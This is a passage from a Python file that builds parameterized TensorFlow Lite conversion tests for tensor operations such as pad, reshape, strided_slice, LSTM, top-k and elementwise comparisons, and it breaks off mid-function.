# TODO(nupurgarg): Add test for tf.uint8.
test_parameters = [
# 4D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 1, 2, 1], [2, 1, 1, 1]],
"paddings": [[[0, 0], [0, 1], [2, 3], [0, 0]], [[0, 1], [0, 0],
[0, 0], [2, 3]]],
"constant_paddings": [True, False],
"constant_values": [0, 2],
},
# 2D:
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2]],
"paddings": [[[0, 1], [2, 3]]],
"constant_paddings": [True, False],
"constant_values": [0, 2],
},
# 1D:
{
"dtype": [tf.int32],
"input_shape": [[1]],
"paddings": [[[0, 1]]],
"constant_paddings": [False],
"constant_values": [0, 2],
},
]
def build_graph(parameters):
"""Build a pad graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
# Get paddings as either a placeholder or constants.
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="padding", shape=shape)
input_tensors = [input_tensor, paddings]
out = tf.pad(input_tensor, paddings=paddings,
constant_values=parameters["constant_values"])
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_reshape_tests(options):
"""Make a set of tests to do reshape."""
# All shapes below are suitable for tensors with 420 elements.
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[3, 4, 5, 7], [4, 105], [21, 5, 2, 2], [420]],
"output_shape": [[15, 28], [420], [1, -1, 5, 7], [-1]],
"constant_shape": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1]],
"output_shape": [[]],
"constant_shape": [True, False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
# Get shape as either a placeholder or constants.
if parameters["constant_shape"]:
output_shape = parameters["output_shape"]
input_tensors = [input_tensor]
else:
# The shape of the shape tensor.
shape_tensor_shape = [len(parameters["output_shape"])]
output_shape = tf.placeholder(
dtype=tf.int32, name="output_shape", shape=shape_tensor_shape)
input_tensors = [input_tensor, output_shape]
out = tf.reshape(input_tensor, shape=output_shape)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_shape"]:
values.append(np.array(parameters["output_shape"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_shape_tests(options):
"""Make a set of tests to do shape."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [0], [1, 1, 1, 3], [2, 3, 4, 5], [5, 5], [10]],
"out_type": [tf.int32, tf.int64],
}]
def build_graph(parameters):
"""Build the shape op testing graph."""
# Note that we intentionally leave out the shape from the input placeholder
# to prevent the Shape operation from being optimized out during conversion.
input_value = tf.placeholder(dtype=parameters["input_dtype"], name="input")
out = tf.shape(input_value, out_type=parameters["out_type"])
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_rank_tests(options):
"""Make a set of tests to do rank."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [0], [1, 1, 1, 3], [2, 3, 4, 5], [5, 5], [10]],
}]
def build_graph(parameters):
"""Build the rank op testing graph."""
input_value = tf.placeholder(dtype=parameters["input_dtype"], name="input")
out = tf.rank(input_value)
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_one_hot_tests(options):
"""Make a set of tests to do one_hot."""
test_parameters = [{
"indices_type": [tf.int32, tf.int64],
"indices_shape": [[3], [4, 4], [1, 5], [5, 1]],
"axis": [0, 1],
"dtype": [tf.int32, tf.int64, tf.float32],
"provide_optional_inputs": [True, False],
}]
def build_graph(parameters):
indices = tf.placeholder(
dtype=parameters["indices_type"],
name="indices",
shape=parameters["indices_shape"])
depth = tf.placeholder(dtype=tf.int32, name="depth", shape=())
if not parameters["provide_optional_inputs"]:
out = tf.one_hot(indices=indices, depth=depth)
return [indices, depth], [out]
on_value = tf.placeholder(
dtype=parameters["dtype"], name="on_value", shape=())
off_value = tf.placeholder(
dtype=parameters["dtype"], name="off_value", shape=())
out = tf.one_hot(
indices=indices,
depth=depth,
on_value=on_value,
off_value=off_value,
axis=parameters["axis"],
dtype=parameters["dtype"])
return [indices, depth, on_value, off_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = [
create_tensor_data(
parameters["indices_type"],
shape=parameters["indices_shape"],
min_value=-1,
max_value=10),
create_tensor_data(tf.int32, shape=None, min_value=1, max_value=10),
]
if parameters["provide_optional_inputs"]:
input_values.append(
create_tensor_data(
parameters["dtype"], shape=None, min_value=1, max_value=10))
input_values.append(
create_tensor_data(
parameters["dtype"], shape=None, min_value=-1, max_value=0))
return input_values, sess.run(
outputs, feed_dict=dict(zip(inputs, input_values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_resize_bilinear_tests(options):
"""Make a set of tests to do resize_bilinear."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [None, True, False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.image.resize_bilinear(input_tensor, size=parameters["size"],
align_corners=parameters["align_corners"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_resize_nearest_neighbor_tests(options):
"""Make a set of tests to do resize_nearest_neighbor."""
test_parameters = [{
"dtype": [tf.float32, tf.int32],
"input_shape": [[1, 3, 4, 3], [1, 10, 2, 1]],
"size": [[1, 1], [4, 3], [2, 2], [5, 6]],
"align_corners": [False],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.image.resize_nearest_neighbor(
input_tensor,
size=parameters["size"],
align_corners=parameters["align_corners"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_sigmoid_tests(options):
"""Make a set of tests to do sigmoid."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 3, 4, 3], [4], [], [1, 2, 3, 4, 5, 6]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.sigmoid(input_tensor)
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_softmax_tests(options):
"""Make a set of tests to do softmax."""
test_parameters = [{
"dtype": [tf.float32],
"input_shape": [[1, 3, 4, 3], [2, 3]],
"dim": [-1, 0],
}, {
"dtype": [tf.float32],
"input_shape": [[4, 7]],
"dim": [-1, 1],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.nn.softmax(input_tensor, dim=parameters["dim"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_space_to_depth_tests(options):
"""Make a set of tests to do space_to_depth."""
test_parameters = [{
"dtype": [tf.float32, tf.int32, tf.uint8, tf.int64],
"input_shape": [[2, 12, 24, 1]],
"block_size": [2, 3, 4],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(dtype=parameters["dtype"], name="input",
shape=parameters["input_shape"])
out = tf.space_to_depth(input_tensor, block_size=parameters["block_size"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_space_to_batch_nd_tests(options):
"""Make a set of tests to do space_to_batch_nd."""
# TODO(nupurgarg): Add test for uint8.
test_parameters = [
{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[1, 2, 2, 3], [2, 2, 4, 1]],
"block_shape": [[1, 3], [2, 2]],
"paddings": [[[0, 0], [0, 0]], [[0, 0], [2, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
{
"dtype": [tf.float32],
"input_shape": [[2, 3, 7, 3]],
"block_shape": [[1, 3], [2, 2]],
"paddings": [[[0, 0], [2, 0]], [[1, 0], [1, 0]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
# Non-4D use case: 1 bath dimension, 3 spatial dimensions, 2 others.
{
"dtype": [tf.float32],
"input_shape": [[1, 4, 4, 4, 1, 1]],
"block_shape": [[2, 2, 2]],
"paddings": [[[0, 0], [0, 0], [0, 0]]],
"constant_block_shape": [True, False],
"constant_paddings": [True, False],
},
]
def build_graph(parameters):
"""Build a space_to_batch graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
input_tensors = [input_tensor]
# Get block_shape either as a const or as a placeholder (tensor).
if parameters["constant_block_shape"]:
block_shape = parameters["block_shape"]
else:
shape = [len(parameters["block_shape"])]
block_shape = tf.placeholder(dtype=tf.int32, name="shape", shape=shape)
input_tensors.append(block_shape)
# Get paddings either as a const or as a placeholder (tensor).
if parameters["constant_paddings"]:
paddings = parameters["paddings"]
else:
shape = [len(parameters["paddings"]), 2]
paddings = tf.placeholder(dtype=tf.int32, name="paddings", shape=shape)
input_tensors.append(paddings)
out = tf.space_to_batch_nd(input_tensor, block_shape, paddings)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_block_shape"]:
values.append(np.array(parameters["block_shape"]))
if not parameters["constant_paddings"]:
values.append(np.array(parameters["paddings"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=56)
@register_make_test_function()
def make_batch_to_space_nd_tests(options):
"""Make a set of tests to do batch_to_space_nd."""
test_parameters = [
{
"dtype": [tf.float32, tf.int64, tf.int32],
"input_shape": [[12, 3, 3, 1]],
"block_shape": [[1, 4], [2, 2], [3, 4]],
"crops": [[[0, 0], [0, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
},
# Single batch (no-op)
{
"dtype": [tf.float32],
"input_shape": [[1, 3, 3, 1]],
"block_shape": [[1, 1]],
"crops": [[[0, 0], [0, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True],
"constant_crops": [True],
},
# Non-4D use case: 1 batch dimension, 3 spatial dimensions, 2 others.
{
"dtype": [tf.float32],
"input_shape": [[8, 2, 2, 2, 1, 1]],
"block_shape": [[2, 2, 2]],
"crops": [[[0, 0], [0, 0], [0, 0]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
},
]
def build_graph(parameters):
"""Build a batch_to_space graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
input_tensors = [input_tensor]
# Get block_shape either as a const or as a placeholder (tensor).
if parameters["constant_block_shape"]:
block_shape = parameters["block_shape"]
else:
shape = [len(parameters["block_shape"])]
block_shape = tf.placeholder(dtype=tf.int32, name="shape", shape=shape)
input_tensors.append(block_shape)
# Get crops either as a const or as a placeholder (tensor).
if parameters["constant_crops"]:
crops = parameters["crops"]
else:
shape = [len(parameters["crops"]), 2]
crops = tf.placeholder(dtype=tf.int32, name="crops", shape=shape)
input_tensors.append(crops)
out = tf.batch_to_space_nd(input_tensor, block_shape, crops)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_block_shape"]:
values.append(np.array(parameters["block_shape"]))
if not parameters["constant_crops"]:
values.append(np.array(parameters["crops"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_transpose_tests(options):
"""Make a set of tests to do transpose."""
# TODO(nupurgarg): Add test for uint8.
test_parameters = [{
"dtype": [tf.int32, tf.int64, tf.float32],
"input_shape": [[2, 2, 3]],
"perm": [[0, 1, 2], [0, 2, 1]],
"constant_perm": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1, 2, 3, 4]],
"perm": [[0, 1, 2, 3], [3, 0, 1, 2]],
"constant_perm": [True, False],
}, {
"dtype": [tf.float32],
"input_shape": [[1, 2, 3, 4, 5]],
"perm": [[4, 3, 2, 1, 0]],
"constant_perm": [True, False],
}]
def build_graph(parameters):
"""Build a transpose graph given `parameters`."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["constant_perm"]:
perm = parameters["perm"]
input_tensors = [input_tensor]
else:
shape = [len(parameters["perm"]), 2]
perm = tf.placeholder(dtype=tf.int32, name="perm", shape=shape)
input_tensors = [input_tensor, perm]
out = tf.transpose(input_tensor, perm=perm)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_perm"]:
values.append(np.array(parameters["perm"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=9)
@register_make_test_function()
def make_squeeze_tests(options):
"""Make a set of tests to do squeeze."""
test_parameters = [{
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 2, 1, 3, 1, 4, 1, 1]],
"axis": [
None, [], [0, 2], [4, 7], [-1, 0, 2, 0, 7, -6], [1], [2, 3, 2],
[-1, -2, -4, -6, -8], [0, 2, 4, 6, 7], [7, 6, 4, 2, 0], [6, 6],
[0, 1, 2, 3, 4, 5, 6, 7], [-2, -3, 1, 0, 7, -5]
],
}, {
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1]],
"axis": [None, [], [0], [-1]],
}, {
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 1, 1, 1, 1]],
"axis": [None, [], [0], [3, 0], [-2, 0, 3, 2]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.squeeze(input_tensor, axis=parameters["axis"])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=12)
@register_make_test_function()
def make_squeeze_transpose_tests(options):
"""Make a set of tests to do squeeze followed by transpose."""
test_parameters = [{
"dtype": [tf.int32, tf.float32, tf.int64],
"input_shape": [[1, 4, 10, 1]],
"axis": [[-1], [3]],
}]
def build_graph(parameters):
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
out = tf.squeeze(input_tensor, axis=parameters["axis"])
out = tf.transpose(out, perm=[1, 2])
return [input_tensor], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
return [input_values], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_values])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=0)
def _make_strided_slice_tests(options, test_parameters,
expected_tf_failures=0):
"""Utility function to make strided_slice_tests based on parameters."""
def build_graph(parameters):
"""Build graph for stride_slice test."""
input_tensor = tf.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["constant_indices"]:
begin = parameters["begin"]
end = parameters["end"]
strides = parameters["strides"]
tensors = [input_tensor]
else:
begin = tf.placeholder(
dtype=parameters["index_type"],
name="begin",
shape=[len(parameters["input_shape"])])
end = tf.placeholder(
dtype=parameters["index_type"],
name="end",
shape=[len(parameters["input_shape"])])
strides = (
tf.placeholder(
dtype=parameters["index_type"],
name="strides",
shape=[len(parameters["input_shape"])])
if parameters["strides"] is not None else None)
tensors = [input_tensor, begin, end]
if strides is not None:
tensors.append(strides)
out = tf.strided_slice(
input_tensor,
begin,
end,
strides,
begin_mask=parameters["begin_mask"],
end_mask=parameters["end_mask"])
return tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Build inputs for stride_slice test."""
input_values = create_tensor_data(parameters["dtype"],
parameters["input_shape"])
index_type = _TF_TYPE_INFO[parameters["index_type"]][0]
values = [input_values]
if not parameters["constant_indices"]:
begin_values = np.array(parameters["begin"]).astype(index_type)
end_values = np.array(parameters["end"]).astype(index_type)
stride_values = (
np.array(parameters["strides"]).astype(index_type)
if parameters["strides"] is not None else None)
values.append(begin_values)
values.append(end_values)
if stride_values is not None:
values.append(stride_values)
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=expected_tf_failures)
@register_make_test_function()
def make_strided_slice_tests(options):
"""Make a set of tests to do strided_slice."""
# TODO(soroosh): add test/support for uint8.
test_parameters = [
# 4-D (basic cases with const/non-const indices).
{
"dtype": [tf.float32, tf.int32, tf.int64],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"strides": [None, [2, 1, 3, 1]],
"begin": [[0, 0, 0, 0]],
"end": [[12, 2, 2, 5]],
"begin_mask": [None],
"end_mask": [None],
"shrink_axis_mask": [None],
"constant_indices": [False, True],
},
# 4-D with non-trivial begin & end.
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0, 0, 0, 0], [1, 0, 1, 0]],
"end": [[8, 2, 2, 3], [12, 2, 2, 5]],
"strides": [None, [2, 1, 3, 1]],
"begin_mask": [None, 8],
"end_mask": [None, 3],
"shrink_axis_mask": [None, 15, -1],
"constant_indices": [True],
},
# Begin, end, strides dim are different from input shape
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[12, 2, 2, 5]],
"begin": [[0]],
"end": [[1]],
"strides": [None, [1]],
"begin_mask": [0],
"end_mask": [0],
"shrink_axis_mask": [1],
"constant_indices": [True],
},
# 2-D
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[2, 3]],
"begin": [[0, 0]],
"end": [[2, 2]],
"strides": [None, [2, 2]],
"begin_mask": [None, 1, 2],
"end_mask": [None, 1, 2],
"shrink_axis_mask": [None, 1, 2, 3, -1],
"constant_indices": [False, True],
},
# Negative strides
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[2, 3]],
"begin": [[0, -1]],
"end": [[2, -3]],
"strides": [[1, -1]],
"begin_mask": [None, 1, 2],
"end_mask": [None, 1, 2],
"shrink_axis_mask": [None, 1, 2, 3, -1],
"constant_indices": [False],
},
]
_make_strided_slice_tests(options, test_parameters, expected_tf_failures=2)
@register_make_test_function()
def make_strided_slice_1d_exhaustive_tests(options):
"""Make a set of exhaustive tests for 1D strided_slice."""
test_parameters = [
# 1-D Exhaustive
{
"dtype": [tf.float32],
"index_type": [tf.int32],
"input_shape": [[3]],
"begin": [[-2], [-1], [0], [1], [2]],
"end": [[-2], [-1], [0], [1], [2]],
"strides": [[-2], [-1], [1], [2]],
"begin_mask": [0, 1],
"end_mask": [0, 1],
"shrink_axis_mask": [0],
"constant_indices": [False],
},
]
_make_strided_slice_tests(options, test_parameters)
# For verifying https://github.com/tensorflow/tensorflow/issues/23599
# TODO(chaomei): refactor the test to cover more cases, like negative stride,
# negative array index etc.
@register_make_test_function()
def make_resolve_constant_strided_slice_tests(options):
"""Make a set of tests to show strided_slice yields incorrect results."""
test_parameters = [{
"unused_iteration_counter": [1],
}]
def build_graph(parameters):
"""Build the strided_slice op testing graph."""
del parameters
input_values = tf.placeholder(dtype=tf.float32, shape=[4, 2])
data = tf.constant([[0, 1, 2, 3],
[4, 5, 6, 7],
[8, 9, 10, 11],
[12, 13, 14, 15]], tf.float32)
return [input_values], [input_values + data[:, :2]]
def build_inputs(parameters, sess, inputs, outputs):
del parameters
input_values = np.zeros([4, 2], dtype=np.float32)
return [input_values], sess.run(
outputs, feed_dict={inputs[0]: input_values})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_lstm_tests(options):
"""Make a set of tests to do basic Lstm cell."""
test_parameters = [
{
"dtype": [tf.float32],
"num_batchs": [1],
"time_step_size": [1],
"input_vec_size": [3],
"num_cells": [4],
"split_tflite_lstm_inputs": [False],
},
]
def build_graph(parameters):
"""Build a simple graph with BasicLSTMCell."""
num_batchs = parameters["num_batchs"]
time_step_size = parameters["time_step_size"]
input_vec_size = parameters["input_vec_size"]
num_cells = parameters["num_cells"]
inputs_after_split = []
for i in xrange(time_step_size):
one_timestamp_input = tf.placeholder(
dtype=parameters["dtype"],
name="split_{}".format(i),
shape=[num_batchs, input_vec_size])
inputs_after_split.append(one_timestamp_input)
# Currently lstm identifier has a few limitations: only supports
# forget_bias == 0, inner state activation == tanh.
# TODO(zhixianyan): Add another test with forget_bias == 1.
# TODO(zhixianyan): Add another test with relu as activation.
lstm_cell = tf.contrib.rnn.BasicLSTMCell(
num_cells, forget_bias=0.0, state_is_tuple=True)
cell_outputs, _ = rnn.static_rnn(
lstm_cell, inputs_after_split, dtype=tf.float32)
out = cell_outputs[-1]
return inputs_after_split, [out]
def build_inputs(parameters, sess, inputs, outputs):
"""Feed inputs, assign variables, and freeze graph."""
with tf.variable_scope("", reuse=True):
kernel = tf.get_variable("rnn/basic_lstm_cell/kernel")
bias = tf.get_variable("rnn/basic_lstm_cell/bias")
kernel_values = create_tensor_data(
parameters["dtype"], [kernel.shape[0], kernel.shape[1]], -1, 1)
bias_values = create_tensor_data(parameters["dtype"], [bias.shape[0]], 0,
1)
sess.run(tf.group(kernel.assign(kernel_values), bias.assign(bias_values)))
num_batchs = parameters["num_batchs"]
time_step_size = parameters["time_step_size"]
input_vec_size = parameters["input_vec_size"]
input_values = []
for _ in xrange(time_step_size):
tensor_data = create_tensor_data(parameters["dtype"],
[num_batchs, input_vec_size], 0, 1)
input_values.append(tensor_data)
out = sess.run(outputs, feed_dict=dict(zip(inputs, input_values)))
return input_values, out
# TODO(zhixianyan): Automatically generate rnn_states for lstm cell.
extra_toco_options = ExtraTocoOptions()
extra_toco_options.rnn_states = (
"{state_array:rnn/BasicLSTMCellZeroState/zeros,"
"back_edge_source_array:rnn/basic_lstm_cell/Add_1,size:4},"
"{state_array:rnn/BasicLSTMCellZeroState/zeros_1,"
"back_edge_source_array:rnn/basic_lstm_cell/Mul_2,size:4}")
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
extra_toco_options,
use_frozen_graph=True)
def make_l2_pool(input_tensor, ksize, strides, padding, data_format):
"""Given an input perform a sequence of TensorFlow ops to produce l2pool."""
return tf.sqrt(tf.nn.avg_pool(
tf.square(input_tensor), ksize=ksize, strides=strides,
padding=padding, data_format=data_format))
@register_make_test_function()
def make_topk_tests(options):
"""Make a set of tests to do topk."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[10], [5, 20]],
"input_k": [None, 1, 3],
}]
def build_graph(parameters):
"""Build the topk op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
if parameters["input_k"] is not None:
k = tf.placeholder(dtype=tf.int32, name="input_k", shape=[])
inputs = [input_value, k]
else:
k = tf.constant(3, name="k")
inputs = [input_value]
out = tf.nn.top_k(input_value, k)
return inputs, [out[1]]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
if parameters["input_k"] is not None:
k = np.array(parameters["input_k"], dtype=np.int32)
return [input_value, k], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value, k])))
else:
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
@register_make_test_function()
def make_arg_min_max_tests(options):
"""Make a set of tests to do arg_max."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32],
"input_shape": [[], [1, 1, 1, 3], [2, 3, 4, 5], [2, 3, 3], [5, 5], [10]],
"output_type": [tf.int32, tf.int64],
"is_arg_max": [True],
}]
def build_graph(parameters):
"""Build the topk op testing graph."""
input_value = tf.placeholder(
dtype=parameters["input_dtype"],
name="input",
shape=parameters["input_shape"])
axis = random.randint(0, max(len(parameters["input_shape"]) - 1, 0))
if parameters["is_arg_max"]:
out = tf.arg_max(input_value, axis, output_type=parameters["output_type"])
else:
out = tf.arg_min(input_value, axis, output_type=parameters["output_type"])
return [input_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
return [input_value], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=4)
@register_make_test_function()
def make_equal_tests(options):
"""Make a set of tests to do equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([], []),
([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the equal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_not_equal_tests(options):
"""Make a set of tests to do not equal."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the not euqal op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.not_equal(input_value1, input_value2)
return [input_value1, input_value2], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value1 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][0])
input_value2 = create_tensor_data(parameters["input_dtype"],
parameters["input_shape_pair"][1])
return [input_value1, input_value2], sess.run(
outputs, feed_dict=dict(zip(inputs, [input_value1, input_value2])))
make_zip_of_tests(
options,
test_parameters,
build_graph,
build_inputs,
expected_tf_failures=3)
@register_make_test_function()
def make_greater_tests(options):
"""Make a set of tests to do greater."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.int64],
"input_shape_pair": [([1, 1, 1, 3], [1, 1, 1, 3]),
([2, 3, 4, 5], [2, 3, 4, 5]), ([2, 3, 3], [2, 3]),
([5, 5], [1]), ([10], [2, 4, 10])],
}]
def build_graph(parameters):
"""Build the greater op testing graph."""
input_value1 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input1",
shape=parameters["input_shape_pair"][0])
input_value2 = tf.placeholder(
dtype=parameters["input_dtype"],
name="input2",
shape=parameters["input_shape_pair"][1])
out = tf.greater(input_value1, input_value2)
